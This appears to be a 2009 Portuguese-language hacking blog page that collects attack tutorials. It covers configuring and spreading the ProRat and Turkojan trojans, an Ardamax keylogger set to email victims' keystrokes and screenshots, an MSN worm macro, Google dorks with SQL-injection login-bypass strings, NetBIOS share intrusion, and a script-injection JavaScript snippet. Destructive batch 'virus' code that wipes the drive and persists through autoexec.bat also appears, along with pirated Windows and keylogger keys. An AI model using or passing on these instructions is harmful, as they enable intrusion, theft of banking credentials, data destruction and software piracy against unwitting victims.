sábado, 3 de janeiro de 2009

Download de Apostilas

http://geocities.yahoo.com.br/simao249/Apostila-de-Eletronica-Basica-2000.pdf

http://geocities.yahoo.com.br/simao249/Capacitor.pdf

http://geocities.yahoo.com.br/simao249/apostila_reguladores.zip

http://geocities.yahoo.com.br/simao249/apostila_somadorsubtrator.zip

http://geocities.yahoo.com.br/simao249/apostila_transistor.zip

http://geocities.yahoo.com.br/simao249/aterramento.zip

http://geocities.yahoo.com.br/simao249/fontes_chaveadas_CAP12.pdf

http://geocities.yahoo.com.br/simao249/livro_ca.pdf

http://geocities.yahoo.com.br/simao249/parabolica1.zip

http://geocities.yahoo.com.br/simao249/tiristores_resumo.zip

Windows Original

1°método

1. Vá em Iniciar > Executar

2. Digite regedit e clique em OK.

3. Já dentro do regedit, navegue até a chave: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \WindowsNT\CurrentVersion\WPAEvents

4. No painel à direita, clique duas vezes em OOBETimer

5. Na janela que foi aberta, apague qualquer valor e clique em OK. Feche o regedit

6. Vá novamente em Iniciar > Executar e dessa vez digite: %systemroot%\system32\oobe\msoobe.exe /a

7. Na janela que foi aberta, escolha a opção Sim, desejo telefonar�

8. Na próxima etapa, clique no botão Alterar chave de produto.

9. Na etapa seguinte, digite a CD-Key: THMPV-77D6F-94376-8HGKG-VRDRQ e clique no botão Atualizar

10. Após clicar no botão Atualizar, o assistente para ativação voltará para a janela anterior, então, clique em Lembrar mais tarde e reinicie o Windows.

11. Reiniciado o Windows vá novamente em Iniciar > Executar e digite: %systemroot%\system32\oobe\msoobe.exe /a

12. Aparecerá a seguinte mensagem:

Ativação do Windows O Windows já está ativado. Clique em OK para sair.


2°método

1°baixe o keyfinder abaixo:
http://w13.easy-share.com/1094791.html


2°e depois de baixado va em Opçoes e charge key windows... e coloka esse key... CD-Key: THMPV-77D6F-94376-8HGKG-VRDRQ


e pronto seu windows estara validado

Tutorial Prorat

Tutorial Prorat
Bom galera, estarei postando aqui o tutorial do prorat, o melhor trojan(pra mim e pra muitos.

Baixe aqui: http://www.prorat.net/downloads.php?id=ProRat_v1.9_Fix2
desative seu antivirus para não ter problemas(não irá danificar tua maquina, apenas para nao dar problema)

Bem depois de descompactar e executar o icone "pro rat" aparecera esse menu. "Mais tio red no meu ta em ingles =\" não tem problema tio red ajuda vcs sabe ai na imagem onde ta "Portugues(Brasil)" no de vcs deve tar inglesh, basta clicar na setinha e colocar "Portugues(Brasil)" bem ai dps vá a opção "Criar" e dps em "Criar servidor"

Bem dps que vc clicar em criar server a primeira janela que aparecera sera esta a de notificação, Mais tio red pra que, serve isso? bem como o nome msm fala é para notificar qndo o infectado se connecta facilitando a descoberta de seu IP, temos duas maneiras a maneira nume 1 "ProConnective notification" no cambpo onde esta "you.no-ip.com" vc coloca seu ip se ele for fixo ou se não for vc cria um dominio no www.no-ip.com, e coloca la mais na frente vamos explicar onde você vai ver se a vitima esta conectada ou nao. A opção de numero 2 você coloca no campo onde esta "bomberman@yahoo.com" vc coloca seu e-mail que qndo a vitima se conecta chegara um e-mail pra vc avisando o IP e o nome do computador.

Nessa image é na opção configurações eu costumo deixar como esta mais vc pode mudar a senha que vc usara para se connecta e o nome da vitima eu acostumo deixar como esta para nao ter problemas .

Na opção Juntar com arquivo vc marca a opção "Juntar servidor com arquivo" e clica em selecionar arquivo ai abrira uma janela explore ai voce leva ate o arquivo que vc quer juntar lembrando que sua extenção tem que ser .exe dps de achar o arquivo clique em abrir

Em exetenções vc pode escolher qual exetenção vc quer que seu server teja lembrando que apenas .exe e .scr tem suporte para vc escolher o icone resultante

Na opção icone escolha o icone na lista para que seu server ganhe ele qndo for criado dps disso clique em criar servidor e pronto ele sera criado e salvo na pasta do seu ProRat

Se vc usou "ProConnective notification" em notifiação antes, agora dps do server criado volte para o menu principal e clique em "ProConnective" aparecera essa janela do lado dps marque a opção "Iniciar ProConnective qndo o windows iniciar e clique em COmeçar a listar a notificações, abrira uma tela preta com o ip da vitima

Dps de mandar o server para a vitima e ela executar va no menu principal onde tem IP coloque o IP dele a porta nao mude, e clique em connecta pedira uma senha que vc configuro antes dps disso só alegria

Tutorial invadindo site

Olá galera.
Fiz este pequeno tutorial meio as pressas,mas espero que voces gostem,principalmente quem esta começando agora Smile

Vou acessar o painel administrativo de um site através de uma técnica chamada “ SQL injection “.
Primeiramente,vou ensinar a voces como pesquisarem por sites vulneraveis a SQL injection com o próprio site do GOOGLE.

1) Acesse www.google.com.br

2) Pesquise por qualquer uma das strings abaixo:

allinurl:admin/index.asp
allinurl:admin/default.asp
allinurl:admin/admin.asp
allinurl:admin/login.asp
allinurl:/admin/entrar.asp
allinurl:/admin/default.asp
allinurl:/admin/index.asp
allinurl:/admin/login.asp
allinurl:/admin/password.asp
allinurl:/admin/senha.asp
allinurl:/login/login.asp
allinurl:/adm/login.asp
allinurl:/adm/index.asp
allinurl:/adm/default.asp
allinurl:/login/index.asp
allinurl:/login/default.asp
allinurl:/webmaster/login.asp
allinurl:/webadmin/default.asp
allinurl:/webadmin/index.asp
allinurl:/webadmin/default.asp
allinurl:/menu_admin/default.asp
allinurl:/menu_admin/index.asp
allinurl:/menu_admin/login.asp
allinurl:/noticias/admin/
allinurl:/news/admin/
allinurl:/cadastro/admin/
allinurl:/portal/admin/
allinurl:/site/admin/
allinurl:/home/admin.asp
allinurl:/home/admin/index.asp
allinurl:/home/admin/default.asp
allinurl:/home/admin/login.asp
allinurl:/web/admin/index.asp
allinurl:/web/admin/default.asp
allinurl:/web/admin/login.asp
allinurl:/home/adm/login.asp
allinurl:/home/adm/senha.asp
allinurl:/home/adm/index.asp
allinurl:/home/adm/defaul.asp
allinurl:/menu/admin/index.asp
allinurl:/menu/admin/default.asp
allinurl:/menu/admin/login.asp
allinurl:/menu/admin/admin.asp
allinurl:/painel/admin/admin.asp
allinurl:/painel/admin/login.asp
allinurl:/painel/admin/index.asp
allinurl:/painel/admin/default.asp
allinurl:/site/admin/default.asp
allinurl:/site/admin/index.asp
allinurl:/site/admin/login.asp
allinurl:/asp/admin/login.asp
allinurl:/asp/admin/index.asp
allinurl:/pedidos/admin/index.asp
allinurl:/pedidos/admin/login.asp
allinurl:/compras/admin/
allinurl:/clientes/admin/
allinurl:/busines/admin/
allinurl:/area_restrita/admin.asp
allinurl:/area_restrita/login.asp
allinurl:/area_restrita/index.asp
allinurl:/acesso/admin.asp
allinurl:/acesso/admin/default.asp
allinurl:/acesso/admin/index.asp
allinurl:/post/admin/default.asp
allinurl:/post/admin/
allinurl:/post/admin/index.asp
allinurl:/post/admin/login.asp
allinurl:/eshop/admin/
allinurl:/eshop/admin.asp
allinurl:/eshop/admin/default.asp
allinurl:/eshop/admin/index.asp
allinurl:/comercio/admin.asp
allinurl:/comercio/admin/default.asp
allinurl:/comercio/admin/index.asp
allinurl:/news/admin/login.asp
allinurl:/news/admin/default.asp
allinurl:/news/admin/index.asp
allinurl:/imprensa/login.asp
allinurl:/imprensa/admin.asp
allinurl:/imprensa/admin/default.asp

pós voces pesquisarem,uma série de páginas serão encontradas. Wink
Arrow Geralmente quando voce acessa uma destas páginas,voce ira cair na tela de “login” do administrador,onde voce deve digitar o nome de usuario e a senha para conseguir acesso ADM do site.
É aqui que usamos o SQL injection,ao invés de colocarmos a senha,usamos algumas strings nos campos de logins,caso voce consiga acessar o painel de controle do ADM,é porque o site esta vulneravel a SQL injection.
Arrow Abaixo vou colocar algumas strings para voces colocarem nos campos de logins: ( Só lembrando que cada string serve para o campo "nome de usuario" e o campo "senha" ao mesmo tempo Wink )

b' or ' 1='
' or '1
' or '|
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
admin ' - -
' ou 0=0 --
"ou 0=0 --
ou 0=0 --
' ou 0=0 #
"ou 0=0 #
ou 0=0 #
' ou ' x'='x
"ou" x"="x
') ou (' x'='x
' ou 1=1 --
"ou 1=1 --
ou 1=1 --
' ou a=a --
"ou" a"="a
') ou (' a'='a
") ou ("a"="a
hi "ou" a"="a
hi "ou 1=1 --
hi ' ou 1=1 --
hi ' ou ' a'='a
hi ') ou (' a'='a
hi") ou ("a"="a

Turkojan

Aqui neste tutorial vou explicar passo a passo e muito bem detalhado como criar um
servidor e como funcionam as funções deste legítimo trojan turco, especificando as
versões 2.0 e 3.0. Você pode baixar o programa no link abaixo:

Site Oficial: www.turkojan.com

Turkojan 2.0 - http://www.turkojan.com/download.php?file=Turkojaneng2.zip


Turkojan 3.0 - http://www.turkojan.com/download.php?file=Turkojaneng3.zip

Primeiramente o que interessa é a criação de um servidor, já que todas as funções
seriam desnecessárias sem um servidor. Vou exemplificar conforme a versão 3.0, já
que são praticamente iguais as versões 3.0 e 2.0.


video aula
http://youtube.com/watch?v=ckubuWj3LIY&mode=related&search=


1°) Criando Um Servidor TurkoJan:


> Clique em “Editor” e nessa tela que se abrir você deverá proceder da seguinte
maneira:

> Clique em “Select Icon” para alterar o ícone do Server, ou se preferir deixe o default
mesmo.

> No campo “Victim Name” você deverá especificar um nome para a vítima(s) que se
infectarem com este servidor, como exemplo = Vítima.

> No campo DNS-IP coloque o seu endereço IP, esta é uma parte interessante do
programa, já que funciona com conexão reversa, pois ao invés do IP da vítima, faça um cadastro no site www.no-ip.com e baixe o Programa No-IP, nesse campo seu ip vai ser parecido com esse "seunome.no-ip.com" esse vai ser seu IP.

> Em “Port Number” você colocará a porta em que o servidor se conectará, de
preferência deixe a porta default mesmo.

> Em “Connection Password” defina uma senha para posteriormente se conectar ao
servidor, podendo deixar a default também, normalmente sendo =”cigicigi”.

> No campo “Bind server with a file”, se preferir disfarçar o servidor com algum arquivo, se preferir disfarçar o servidor com algum arquivo poderá fazer marcando a opção correspondente.

> No campo “Fake error message” você pode colocar uma mensagem de erro falsa
como alerta após a execução do servidor, editando-a ou, sem mensagem mesmo.
2°) Conectando-se Ao Servidor:


> Depois que você mandar de alguma forma o servidor pra determinada pessoa e ela o executar, confira se a senha que você configurou para o servidor corresponde à que aparece no campo “Pass” da interface do programa (recomendo usar a mesma senha sempre pra evitar esquecimentos) e clique no botão “Active”,

> Aparecerá uma pequena janelinha no canto direito inferior da tela com uma mensagem: “Vítima is online now” que significa que a vítima está online e você poderá se conectar.

> Na parte inferior da interface do programa você terá a lista de suas vítimas
conectadas no momento, para se conectar a uma delas, clique no IP correspondente
(normalmente mais que dois cliques para dar certo).

> Verifique se a mensagem na barra de títulos identifica que você realmente se
conectou, se sim, OK. ) Função Passwords:


> A primeira opção de interação com o PC da vítima será a “passwords”, onde a “local
passwords” não sei pra que que serve (indica passwords da própria máquina).

> Em “remote passwords” você obterá os passwords do PC onde o servidor
conectado está alojado, dentre outras, podendo achar as senhas do PC, do FTP,
Outlook, etc... E poderá salvar estas senha em um arquivo de texto.


4°) Função Comunication:


> Em “Chat with server” você pode interagir através de textos recebidos
instantaneamente pela vítima, onde se abrirá uma pequena janela em seu PC,
podendo lhe enviar mensagens também.

> Em “Chat Properties” apenas especifique como você irá querer que apareça o seu
nome como o da vítima nacaixa de diálogos.

> Em “Other Properties” defina o tamanha em percentual da tela do Chat.

> Agora basta clicar em “Start Chatting With Victim” para iniciar a conversa.

> Em “Send message” você tem a opção de enviar uma mensagem para o computador da vítima, podendo escolher um ícone para isso e podendo testar antes de enviar clicando em “Test Message” e enviar clicando no botão “Send Message”

5°) Função File Options


> Em “File Manager” você tem acesso aos arquivos do Explorer do PC da vítima,
podendo acessar os objetos de inicialização, painel de controle, pasta Windows, e
demais pastas de forma clara e objetiva.

>Na parte inferior da tela que se abre, você terá os botões com determinadas funções específicas, como fazer download ou upload de algum arquivo, criar uma nova pasta, deletar uma pasta, executar determinado arquivo, entre outros.

> Em “Find File” você poderá fazer uma pesquisa no PC da vítima, especificando a
unidade e o formato do arquivo a ser encontrado, por exemplo = *.exe; *.ini; *.bat.
Para isso basta clicar no botão “Find File”.


Créditos : Turkojan

Malware para MSN.

Para começar vc vai precisar de dois programas:
EZmacros
www.americansys.com
Quick batch file compiler
www.abyssmedia.com
1º Entre no ezmacros e crie uma nova macro clicando em add
2º Selecione "remember mouse and keyboards events"
3º Selecione "wait for a certain window apear"
4º Na caixa de texto digite conversa
5º Desmarque todas as opçoes e coloque "playback speed" no maximo
6º Em create edit digite o texto que a vitima fale automaticamente para os contatos EX: Fala blz? olha esse site aqui: www.seuvirus.com...assim seu trojan irá se espalhando na net, hospede seu arquivo em algum free host para por o link de download; E clique na tecla enter(nao o do teclado o da tela)
7º Clique em avançar e conclua a macro
8º La no menu das macros clique com o direito na macro que vc fez e coloque export to .exe
9º Salve com o nome que voce quiser e conclua
10º Abra o quickbfc
11º Na aba include adicione o arquivo que voce fez
12º Em source digite:
copy nomedoarquivo.exe "C:\Documents and Settings\all users\Menu Iniciar\Programas\Inicializar" start nomedoarquivo.exe
13º Em custom mude o icone e pronto e click em Build, Pronto! quando o cara abrir o arquivo sempre que ele entrar no msn e abrir uma janela de conversa o programa vai digitar o texto que voce colocou na macro e mandar pro contato.
Use um joiner e junte o arquivo do macros com o seu Trojan e envie para a vitima!

Keylogger

Key logger (que significa registrador do teclado em inglês) é um programa de computador do tipo spyware cuja finalidade é monitorar tudo o que a vítima digita, a fim de descobrir suas senhas de banco, números de cartão de crédito e afins. Muitos casos de phishing asim como outros tipos de fraudes virtuais se baseiam no uso de algum tipo de keylogger, instalado no computador sem o conhecimento da vítima, que captura dados sensiveis e os envia a um hacker que depois os utiliza para fraudes. Existem softwares apropriados para se defender deste tipo de ameaça. É sempre oportuno que um computador conectado à internet seja protegido através de um software "AntiSpyware" de um "Firewall" e de um "AntiVirus".

Invasão aos bancos ou não?

Invasão? Não, infelizmente nesse aspecto os bancos são realmente seguros, seus sistemas e databases são bastante seguros para serem roubados assim facilmente. Não que não haja possibilidades, é como eu sempre digo “sistemas são feitos por homens e estes como sabemos estão longe da perfeição...logo nenhum sistema é perfeito”.

Hacker ou Não?

Hacker? Os termos hoje em dia estão muito deturpados... Bankers, Carders, Crackers todos são chamados pela mídia de hackers. É apenas esse termo que eles conhecem. Esses indivíduos que fazem fraudes com contas bancárias são chamados de Bankers, os que fazem fraudes com cartões são chamados Carders. Já os Hackers são especialistas em invasão de sistemas. Hackers também tem ética, para que destruir uma coisa que você usa?

Quais as engenharias usadas?

Bom, a respeito de engenharias, pensem comigo. A engenharia tem que ser algo interessante, que estimule o destinatário a clicar no link do arquivo. Nesse caso usaremos as engenharias de empresas como Serasa, SPC, e outras empresas de proteção ao crédito. Pois se você recebe um e-mail aparentemente de uma empresa verídica informando que seu nome está sujo no SPC, Serasa etc. sua atitude seria clicar no link do relatório e fazer a verificação, é nesse momento que você se dá mal. Outras engenharias bastante usadas são: Veja a Playboy desse Mês de graça, Ganhe dinheiro Fácil, Mp3 gratuitos, Emprego na Hora, Trabalhe no Computador, Voxcard, etc. são tantas.

Como Funcionam?

O método de funcionamento de um keylogger é muito simples. Ao ser executado por um usuário curioso, ele se instala no registro do computador, e quando a pessoa abre uma das páginas dos bancos em que esse keylogger foi programado para logar, ele grava todas as teclas digitadas no site do banco incluindo o teclado virtual. Para o keylogger logar um determinado banco ele tem que ter os dados desse banco armazenados em sua database, sem esses dados o keylogger não loga o banco. E ao obter esses dados, o keylogger age como emissor de e-mail e envia as suas senhas em modo de texto limpo para o e-mail configurado pelo compilador do keylogger. Lembrando que o keylogger dos bankers é um keylogger inteligente, que não loga coisas aparentemente inúteis para eles como senhas de e-mails, provedores etc. Ele só começa a logar quando a pessoa entra no site do banco especificado em sua database de programação.

Atualmente o melhor Keylogger, indetectavel pela maioria dos antivirus é o ardamax, que você encontra no site www.ardamax.com
e o tutorial do mesmo estarei postando

primeiramente instale o ardamax (obvio)

se vc naum tiver o ardamax manda um scrap pra mim dizendo q ker o ardamax e seu e-mail q eu te mando

vamos lahh

depois de instalado o ardamax
vahh nakela bandeja de programas q estah localizada ao lado do relogio

clike com o botao direito em cima do icone do ardamax aparecera seu menu

vc vai ateh remote instalation

primeira tela: welcome

clica logo em avanlar

segunda tela: appearence

essa tela pede um arquivo q vc gostaria de unir ao seu keylogger

isso ehh usado geralmente pra vc confundir a vitima tipo vc coloca o keylogger num video manda o video pra vitima ela abre ve o video e acha q tudo passo de apenas um videozinho maneiro q vc mando pra ela e acaba se infectando

bom

o q vc faz?? marca a opçao append keylogger engine ....

vc vai onde tah escrito file path e depois em brownse e procura o arkivo

pode ser qualquer arkivo
mas eu sugiro q vc use um video

terceira janela: invisibility

marca tudoooo

isso define o quanto vc ker q seu keylloger esteja invisivel

quarta janela: security

marque tudo isso fara com q se uma pessoa acidentalemte digite as teclas de atalho do programa ela evite de vber os logs e de ver pra q e-mail estah sento mandando esses logs pq vc jahh penso se a pessoa te conhece e ve seu e-mail lahh no keylogger

clique em change password e escreva uma senha

kinta janela:web update

pula isso clica em abvançar

sexta janela: options

como eu tinha avisado ali em cima existe uma combinaçao de teclas q abre o programa ehh nessa janela q vc vai definir essa combinaçao de teclas deixe as duas janelas marcadas run on windows startup isso ker dizer q o logger vai ligar assim q ligarem o windows e start in hidden mode pra ele inciar em modo invisivel

digite as teclas q vc ker q ele abra como exemplo ctrl+alt+o

se vc kiser marque uma data pra esse arkivo se auto destruir
setima janela: control

isso define o tempo em q vc ker q ele faça os logs sugiro q vc marque 15 minutos senaum vai lotar sua caixa de entrada de e-mail

como serah enviado sugiro q vc marque e-mail q ehh como estou explicando aki

o q serah capturado nesse log

se vc kiser pode marcar tudo

keystrokes = teclas digitadas
web log = paginas visitadas pela pessoa
chat log = conversas em mensageiros
screenshots = fotos da tela

log format isso define se vc ker ver a pagina em html no seu proprio e-mail ou entaum em um arkivo q vc sohh pode abri com o ardamax q estah instalado no seu pc

na proxima opaçao vc define o se vc ker q te envie o log quando exceder a um certo tamanho o arkivo de log sugiro q vc desmarque essa opçao

oitava janela: e-mail

agora ehh a parte onde todos realmente kerem a ajuda

ninguem consegue resolver o problema ai

entaum vamos lahh

faça um e-mail sohh pra os logs nunk use seu proprio e-mail

uma dica faça o e-mail na itelefonica www.itelefonica.com.br

exemplo

send to: exemplo@itelefonica.com.br

send from:deixa em branco q fik melhor pra vc saber no seu e-mail pq o ardamax dexa sua propria assinatura no e-mail

smtp host: vc vai ver a smtp do seu host nunca tente clicar em find pq nunk acha a smtp certa a smtp dp itelefonica vem escrita logo depois q vc termina de fazer seu e-mail q ehh "smtp.itelefonica.com.br"

username vc deixa seu login do e-mail
e password vc dexa a senha do e-mail

eu sei o q vc deve tahh pensando esse kra fez isso pra roba minha senha mas naum ehh tanto q eu falei pra vc criar um e-mail sohh para isso e naum me pergunte o pq do keylogger pedir senha pq eu tbm naum sei

pronto clica em test lahh em cima e vai na sua caixa de entrada se der certo vc recebera um e-mail de confirmaçao imediatamente

nona janela : control

dexa tudo marcado naum vo explica a funçao de cada um pq jahh ta batendo priguilça

mas arrume um tradutor q vc vai intender mais ou menos

continuando de novo
decima janela: screenshots

aki vc marca de quanto em quanto tempo seu keylogger vai tirar fotos da tela marque de 10 em 10 minutos senaum vc vai da uma travalda fdp no computador da vitima fazendo com q de erro (isso acontece em computadores q naum saum mtuu bons ou seja no computador de 90% da população brasileira)

target: vc define se vc ker q tire a foto da tela toda ou apenas da janela q estah ativa no momento sugiro full screen (a janela toda)

image quality: define a qualidade da imagem

sugiro q vc coloke low quando mais high vc colocar mais pode acontecer o q eu citei anteriormente o pc da vitima travar

11ª janela : destination

como o nome jahh diz ehh o destino do arkivo

fika sempre desse jeito C:\Arquivos de programas\PFG\Install.exe

vc pode clicar em brownser e escolher outro local para salvar o arkivo assim como o nome q esta como install

open the folder containing keylogger engine

marque isso se depois q vc criar vc ker q abra a pasta onde esta o keylogger

chenge icon

vc escolhe o icone q esse arkivo tera

12ª finish

agora onde vc escolheu pra salvar aparecera varios icones vc vai pegar apenas o arkivo q vc criou se vc mudou o nome do arkivo install vai estar com o nome q vc escolheu se nao vai estar como install mesmo coloke esse arkivo em um arkivo zip pra vc poder mandar por msn pq ele salva em extensao .exe e o antivirus da pessoa avisara ela

e pronto

saia enviando e seja feliz

mas lembre-se

faça tudo com mtaaaa moderaçao

serials:


Name: Bill-Faccini ¬ ¬ ¬ ¬ ¬ ¬ ¬ ¬ ¬ ¬ ¬¬ ¬¬ ¬¬ ¬¬ ¬¬ ¬¬ ¬¬ ¬¬ ¬ ¬ Serial: MOQSAOOJKPRRROQ

Name: membros ¬ ¬ ¬ ¬ ¬ ¬ ¬ ¬ ¬ ¬ ¬ ¬ ¬ ¬ ¬ ¬ ¬ ¬ ¬ ¬ ¬ ¬ ¬ ¬ ¬ ¬ ¬ Serial: UKPIUQDTITNVNRP

Invasão por IP

1º- Certifique-se de que a pessoa que você quer invadir possui este programa: nbtstat.

2º- Vá ao Prompt do MS-DOS.

3º- Digite: nbtstat -a o IP do cara que você quer invadir

4º- Aparecerá se a pessoa tiver compartilhamento de arquivos as pastas do PC dela. Se não aparecerá : Host Not Found (o foda é que não da para invadir o computador de certos caras por causa disso então não se entusiasme tanto pois só da para invadir aquelas pessoas que tem no PC compartilhamento de arquivos as pastas)

5º- Caso apareça um monte de nomes esquisitos com isso antes : "<03>", você deve pegar o nome do negócio que estiver com <03> atrás do nome.

6º-Crie um arquivo .txt com o nome de LMHOSTS. Digite lá : O IP do cara NetBios dele . O NetBios é aquele nome esquisite que tem o atras. (Digite exatamente daquela forma que eu digitei)

7º- Mapeie sua unidade de disco de forma que a máquina do cara se torne parte de seu PC.

8º- Vá em "Iniciar", "Executar" e digite: //IP_do_cara e ponha "OK"

9º- Pronto! Você invadiu por IP!

10º- Conselho : Não apague nem modifique NADA somente vasculhe bastante nas coisas do individuo e se achar algo interessante pega para você. Nós da Hackerianø´§™ não aconselhamos você a fazer isso, só estamos lhe mostrando como é, mas não para você fazer.

OBS: Tem algumas pessoas que renomeiam o arquivo vnbt.386 no windows\sytem para que se alguem tente te nukar ou invadir não consiga... ; pois bem você vai ter que renomear o seu arquivo senão não da para invadir.

crie seu próprio JS

Vocês querem só colar na barra de endereços e da enter!
agora criem o de v6!
Primeiro,sempre que for começar um javascript que se cole no navegador,começe ele assim:

javascript: agora vc poem o comando desejado,exemplo:
javascript:comando....

Ai vão alguns comandos e descrições!:

document.forms[1] = Pega Post Token Automáticamente,usado muito para

Flood's,códigos de submeter funções no Orkut e etc...

alert ("mensagem aqui!") = Usado para criar um alerta com uma mensagem,vc pode mudar o alerta!

document.body.innerHTML+='' = Cria Um Iframe (Quadro) que permite que o script seja executado nele! no "800" e no "600" Você pode mudar,eles indicam o tamanho do Quadro!
var

txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/a/gi,"A") = Faz mudar a fonte da letra em que você digitou na caixa de texto dos Scraps ou post's,vc muda o (/a/gi,"A") pela letra que quer mudar na fonte.....!

prompt('Mensagem','') = Abre uma caixa de texto para o usuário digitar,meio que inútil,mais é um JS.

window.close() = Fecha a Janela em que o JS é rodado.

window.open('','newWin','width=465,height=130') = Abre uma nova janela com o tamanho desejado em (Width e Height).

c=document;a=c.createElement('script');a.src='htt¬p://ww-w.sitecomcomando.com.br';b=c.body;b.appendChild(a) = Ativa o Script da Url inserida no Script..

javascript:document.images[3].src="htt¬p://images3.¬orkut.com/..." = Faz trocar a foto do Profile ou Comunidade de Perfil para a Url da Imagem do "Orkut" Inserida.....!

Agora,terminou seu Javascript?coloque no fim dele agora o que está em vermelho ai: ;void (0)

Pronto!agora cola na barra de endereços e da enter!

Lembre-se Sempre,exeplo:
javascript:alert ('mensagem');void (0)

no começo o javascript:

e no final o ;void (0)


Pra que por o ";void(0)" no fim do JS ?

por que se vc naum por,quando usar o java,ele vai mudar a janela executando o código nela!

esse aqui por exemplo fexa qualquer janela navegador
javascript:parent.close();

Criando Vírus Parte I

Em primeiro lugar, você deve abrir o MS-DOS e seguir os passos abaixo:

Digite: Edit (nome do seu arquivo).bat, deverá aparecer uma tela azul.

Entre com os comandos: @ECHO OFF e BREAK OFF. A página deverá ficar da

seguinte maneira, como está embaixo:

@ECHO OFF
BREAK OFF


Depois disso, a pessoa escolhe o que seu vírus deve fazer. Depois ela usa o comando copy a:\(nome do seu vírus).bat autoexec.bat, ela então terá a certeza de estar executando seu vírus ao iniciar o computador-alvo. Agora vamos supor que o seu vírus seja capaz de apagar todos os arquivos do PC alheio. Você deve usar o seguinte

comando:

deltree/y c:\*.*

Agora, o vírus simples da pessoa está completo. É só a vítima (seu amiguinho) executar o arquivo e pronto!

Importante:

Caso a pessoa passe esse vírus via disquete, ele não deve esqueçer de finalizar o arquivo com o comando deltree/y a:\*.*. Isso serve para não deixar vestígios de seu ato insano.

Criando Vírus Parte II

Para fazer um virus existem muitas plataformas e varios tipos de virus existe virus tipo *.bat *.exe *.mid *.sis *.dll *.etc... tem de todas as formas que vc possa imaginar para criar um virus do tipo melissa ou I love You não basta 5 minutos e im semanas ou até meses para adicionar suas configuraçoes e o que ele ira causar as vitimas como se espalhar pelo computador ou se camuflar em outros executaveis ou até mesmo no momento se espalhar por toda sua lista de contato e enviar varias copias dele mesmo para e-mails de amigos e qualquer pessoa que estiver na sua lista de contato.
Os virus mais fracos os chamados *.bat ou mais conhecidos como virus batch são criados em minutos basta ter a formula isso vc encontra no nosso link Virus.BAT vc pega uma formula seja de um virus pra excluir windows ou para enviar erros ao modem tanto faz sempre quando vc mesmo criar uj batch nunca eu falei NUNCA rode ele no seu propio HD para ver se funciona ou não prefira sempre os micros da escola ou mande para algum lamer ( ou como preferir LAMMER ou COBRA )
COBRA = Pessoa da internet que não sabe exatamente nada akele que rasteja e ainda leva pancada.
Quer editar seu virus *.bat agora ? então vamos lá clique no menu iniciar vá até programas em seguida aponte para acessórios e abrao arquivo NotePad ou WordPad lá vc digita isso exatamente como esta aqui :

@ECHO OFF
@BREAK OFF
deltree/C: Y\*.*

A: nome do virus.bat autoexec.bat

Em seguida salve esse arquivo assim : Nome do virus.bat

Pronto agora vc tem um virus .bat no seu propio micro nossa! que emoção não sei se vou conseguir digitar mais ( chega de brincadeira )

Agora de maneira nenhuma mesmo se desconfiarque esse virus está errado não abra esse arquivo então é só isso vc agora já tem mais ou menos uma noção do que é um virus.bat e um .exe


Comandos básicos Badcom

@echo off = não mostra os comandos que serão executados
cls = limpa a tela
echo www.redehacker.com = aparecerá na tela "www.redehacker.com" por exemplo
echo > threat.bat por syspunk = crirá um arquivo threat.bat e nele terá escrito "por syspunk"
echo > threat.bat c:\deltree /y windows = criará um arquivo, com nome threat.bat, no hd da pessoa que quando executado apagará a pasta windows sem nenhuma pergunta
md redehacker.com = cria uma pasta com nome "redehacker.coml" no hd da pessoa
del *.xxx (onde xxx é a extenção do arquivo) = paga os arquivos com a extenção desejada exemplo: del c:\windows\*.ini = apaga os arquivos .ini da pasta do windows
deltree /y windows = apada o diretório do window$ sem perguntar sim ou não
ren autoexec.bat autoexec.seunick = renomeia o autoexec.bat para o nome que você quiser
GOTO: este comando faz repetição de comandos da seguinte maneira:
:INI = indica para onde você quer voltar
GOTO INI = volta para onde o :INI estiver ( não precisa ser INI pode ser oq vc quiser com os dosi pontos antres e depois o mesmo nome com GOTO antes
CHOICE /c 123 = mostra um prompt de questão e você precisa do seguinte comando (pode ter quantos números você quiser)
IF ERRORLEVEL 2 DES = desliga o pc se a pessoa digitar 2
IF ERRORLEVEL 1 REI = reinicia o pc se a pessoa escolher 1
(as mensagens e os nomes dos arquivos podem ser alteradas por você)

Colocando seu nome do menu iniciar

1°Baixe o ResHacker muito leve, naum eh um programa eh um arquivo soh.
2°após deziparem ele abram o ícone que tem uma janela e um martelinho. Depois cliquem em arquivo, open e vá até sua unidade onde esta o windows, NO meu caso C://WINDOWS/explorer.exe, Ok. Abram o arquivo explorer pelo ResHacker:
3°gora vamos abrir o seguinte caminho no ResHacker: String Table >> 37 >> 1046
4°Daí, vamos mudar o nome INICIAR para o nome que você quer usar, não remova as aspas, e depois clique em Compile Script
5°Agora Vc precisa salvar o arquivo em uma nova pasta, utilize o nome explorer.exe, pode criar ela dentro da pasta windows mesmo ou em um lugar de sua preferência:
6°Depois de salvar ele vai criar um arquivo com o mesmo nome que vc salvou, mas escrito explorer original
7°Agora aperte Ctrl+Alt+Del e na aba processos procure por explorer.exe, depois de selecionar ele clique em finalizar processo:
8°Agora clique na aba APLICATIVOS selecione NOVA TAREFA e procure pelo explorer.exe que vc salvou. Depois de abrir ele vc vai notar que o iniciar alterou o nome:
9ºAgora vá na pasta windows, copie os dois arquivos explorer.exe e o explorer original, depois salve em algum lugar para vc poder restaurar o sistema, depois de salvo vá até o lugar onde vc colocou o explorer alterado, copie os dois arquivos aquele que vc salvou e aquele que se criou sozinho. Volte outra vez a pasta windows e cole eles, irá aparecer uma mensagem perguntando se vc deseja substituir, clique na opção sim.
10ºCaso dê algum erro simplesmente tecle Ctrl+Alt+Del e procure pelo explorer.exe que vc alterou, selecione ele e irá abrir novamente, depois disso verifique se vc conseguiu substituir mesmo os dois arquivos da pasta windows caso não tenha certeza substitua-os novamente.

Caindo MSN

